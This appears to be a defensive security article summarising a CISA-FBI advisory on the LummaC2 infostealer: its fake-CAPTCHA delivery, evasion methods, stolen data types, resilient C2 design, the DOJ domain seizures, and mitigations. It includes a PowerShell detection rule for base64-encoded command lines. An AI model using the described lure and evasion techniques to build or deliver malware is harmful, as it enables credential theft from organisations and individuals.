LummaC2 Infostealer Targets US Critical Infrastructure: CISA-FBI Advisory AA25-141B and DOJ Domain Seizures

The FBI and CISA (Cybersecurity and Infrastructure Security Agency) jointly published advisory AA25-141B detailing the tactics, techniques, and procedures (TTPs — the methods adversaries use to gain access, move through networks, and steal data) of LummaC2, a prolific Malware-as-a-Service (MaaS — a criminal business model where malware is rented to other attackers for a fee) infostealer that has been confirmed targeting US critical infrastructure organizations across multiple sectors. Concurrent with the advisory, the US Department of Justice seized five core LummaC2 domains and more than 2,300 related websites in coordination with Microsoft and Europol — disrupting but not eliminating LummaC2 operations.

LummaC2 Infostealer: Technical Details

LummaC2 (also referred to as Lumma Stealer) is an information-stealing malware first observed in late 2022, initially advertised on underground forums by a threat actor known as "Shamel" operating under the handle "Shamel_Bits." From its first appearance, LummaC2 was designed as a commercial MaaS platform: subscribers pay a recurring fee to receive access to the malware builder, C2 (command-and-control) infrastructure, and a web panel to manage stolen credential logs.

MITRE ATT&CK (software entry S1213) documents LummaC2's technical capabilities in detail. Key TTPs from CISA advisory AA25-141B:

Initial access — T1566 (Phishing) and T1204 (User Execution): LummaC2 is delivered primarily through two mechanisms. The first is spearphishing emails with malicious hyperlinks or attachments. The second, and increasingly dominant, delivery method is fake CAPTCHA lures — attackers direct users to a webpage displaying a convincing CAPTCHA verification dialog. The dialog instructs users to open the Windows Run window (Win + R) and paste clipboard contents, triggering a Base64-encoded PowerShell (a Windows scripting language commonly used by both administrators and attackers) process that downloads and executes the LummaC2 payload. This technique is a variant of the ClickFix social engineering approach.

LummaC2 is also distributed embedded within spoofed versions of legitimate software: media players, system utilities, PDF readers, and developer tools distributed via malicious download sites, SEO-poisoned search results, and compromised software repositories.

Defense evasion — T1027, T1055, T1562: The malware employs multiple layers of defense evasion:

• Fileless execution — payload runs in memory without writing a binary to disk, evading file-based antivirus scanning
• Dynamic API resolution — instead of importing Windows API functions at load time (where security tools can monitor them), LummaC2 resolves function addresses at runtime using direct system calls that bypass the standard Windows API layer monitored by most EDR (Endpoint Detection and Response) platforms
• String and configuration obfuscation — all embedded strings, including C2 server addresses, are encrypted and decrypted at runtime
• Anti-sandbox and anti-VM techniques — the malware checks for virtual machine artifacts (registry keys, process names, hardware identifiers common in analysis sandboxes), delays execution, and requires evidence of human interaction before triggering its payload

Credential and data access — T1555, T1539, T1528: Once active, LummaC2 silently exfiltrates a wide range of data:

• Browser-saved passwords and autofill data from Chrome, Firefox, Edge, Brave, Opera, and other Chromium-based browsers
• Browser session cookies — which allow attackers to hijack authenticated sessions without knowing passwords
• PII (Personally Identifiable Information — name, address, date of birth, national ID numbers) from documents and browser form data
• Financial credentials — banking site logins, payment card data stored in browsers
• Browser extensions, including cryptocurrency wallet extensions (MetaMask, Phantom, Keplr, etc.)
• Cryptocurrency wallet seed phrases and private keys from installed wallet software
• MFA (Multi-Factor Authentication — a login protection mechanism using a second verification step such as a one-time code) codes and TOTP (Time-based One-Time Password) secrets from authenticator apps where accessible

C2 infrastructure — T1071, T1090: LummaC2 employs a multi-tiered C2 architecture designed for resilience. Each malware build contains nine hard-coded tier-1 C2 domain addresses that rotate frequently. If all tier-1 domains are unreachable — for example, following domain seizures — the malware falls back to C2 addresses embedded in Steam community profiles and Telegram channels controlled by the operators, making full infrastructure takedown significantly harder than targeting a fixed set of domains.

Exploitation Status and Threat Landscape

The scale of LummaC2 operations is documented in the advisory: between April and June 2024 alone, private-sector sources identified over 21,000 listings for LummaC2 credential logs across underground marketplaces — a 71.7% year-over-year increase. Each "log" represents the complete credential harvest from one compromised machine.

The FBI and Europol, coordinating with Microsoft's Digital Crimes Unit, disrupted the LummaC2 network in May 2025 by seizing five core control panel domains and approximately 2,300 affiliated distribution and C2 sites. Within 24 hours, LummaC2 operators announced three replacement domains to their subscriber base — and the DOJ seized those as well the following day. The rapid domain replacement demonstrates LummaC2 operators' resilience planning and the limitations of infrastructure takedown as a definitive mitigation.

Industrial Cyber reported that active LummaC2 campaigns continued targeting US critical infrastructure organizations even during the disruption window. The advisory confirms IOC activity from November 2023 through at least the advisory publication date.

Who Is Affected

CISA's advisory specifically calls out US critical infrastructure sectors as confirmed targets, including healthcare, financial services, manufacturing, energy, and government. The MaaS model means LummaC2 is operated by dozens of independent criminal affiliates simultaneously — meaning targeting is not centrally coordinated. Any organization whose employees have corporate credentials stored in browsers, use web-based SaaS applications, or access sensitive systems from managed or unmanaged devices is a viable target.

Individuals exposed to the campaign most commonly encounter it via:

• Malicious sponsored search results for cracked or free versions of commercial software
• Email phishing campaigns distributing fake invoices, shipping notifications, or HR documents
• Fake software download sites returned by SEO-poisoned search results
• Compromised legitimate websites that serve the fake CAPTCHA lure to visitors

What You Should Do Right Now

• Deploy endpoint detection for clipboard-based execution patterns. LummaC2's fake-CAPTCHA delivery relies on users pasting PowerShell commands from the clipboard. Detection rule: alert on cmd.exe or powershell.exe processes spawned as children of Run dialog or Explorer that include Base64-encoded strings:

# PowerShell detection: alert on suspicious base64 in command-line args
Get-WinEvent -LogName Security | Where-Object {
    $_.Id -eq 4688 -and
    $_.Message -match "powershell" -and
    $_.Message -match "base64|enc|encoded"
}

• Enable browser credential protection. Enforce policies that prevent browsers from storing passwords for sensitive applications (VPN portals, email, cloud consoles, financial systems). Use a dedicated password manager rather than browser-native credential storage. LummaC2 specifically targets browser credential databases.

• Block known LummaC2 distribution channels at the proxy/DNS level. Implement DNS filtering (e.g., via Cisco Umbrella, Cloudflare Gateway, or Pi-hole for on-premise) to block domains serving fake software installers. Subscribe to threat intelligence feeds for current LummaC2 IOCs — the CISA advisory and the IC3 bulletin include indicators.

• Audit browser extension installations across your organization. LummaC2 specifically targets browser-based cryptocurrency wallet extensions. Review and enforce an allowlist of approved browser extensions via Group Policy or MDM (Mobile Device Management) to prevent unauthorized wallet extensions from being present in corporate browsers.

• Implement short-lived session tokens and MFA for all privileged access. Since LummaC2 steals session cookies to bypass password authentication, ensure privileged sessions (cloud consoles, VPN, email admin) enforce re-authentication at short intervals and cannot be replayed by an attacker who steals a session token.

• Hunt for indicators in your environment. Review MITRE ATT&CK S1213 for the complete technique listing and use it to build detection coverage. Check DNS logs for connections to known tier-1 C2 domains and Steam community profiles with suspicious update patterns.

Background: Understanding the Risk

LummaC2's rise illustrates the maturation of the credential theft economy. In 2022, sophisticated credential-stealing operations required either custom malware development or access to private crimeware networks. By 2024, LummaC2 had commoditized this capability: for a subscription fee equivalent to a few hundred dollars per month, any criminal actor could deploy a professional infostealer with evasion capabilities that rival nation-state tools, complete with a web panel showing harvested logs in real time.

The critical infrastructure targeting noted in the CISA advisory reflects a downstream consequence of this commoditization. Organizations in critical sectors do not become targets through deliberate selection by LummaC2 operators — they become victims because their employees, contractors, or vendors use devices and browsers where LummaC2-harvested credentials enable access to systems that happen to be critical. A contractor's personal laptop infected with LummaC2 that stores credentials to a water utility's VPN represents the same risk as a direct attack on that utility.

The multi-tiered C2 infrastructure — tier-1 domains, Steam profiles, Telegram channels — represents a deliberate design choice by LummaC2 operators to survive takedown attempts. The DOJ seizure in 2025 was the most significant disruption action to date and demonstrates that law enforcement can impose meaningful operational costs on MaaS operators. But the 24-hour domain replacement response time illustrates that infrastructure takedown alone cannot neutralize a well-resourced criminal operation. Defender-side mitigations — credential hygiene, browser protection, endpoint detection — remain the primary reliable defense.

Conclusion

LummaC2 remains an active, resilient threat despite the 2025 DOJ disruption action. Organizations in critical sectors should treat the CISA-FBI advisory as a direct call to audit browser credential exposure, deploy detection for clipboard-execution attacks, and implement session controls that reduce the value of stolen authentication tokens. The single highest-impact action is eliminating browser-stored credentials for access to sensitive systems — removing the primary commodity LummaC2 is engineered to harvest.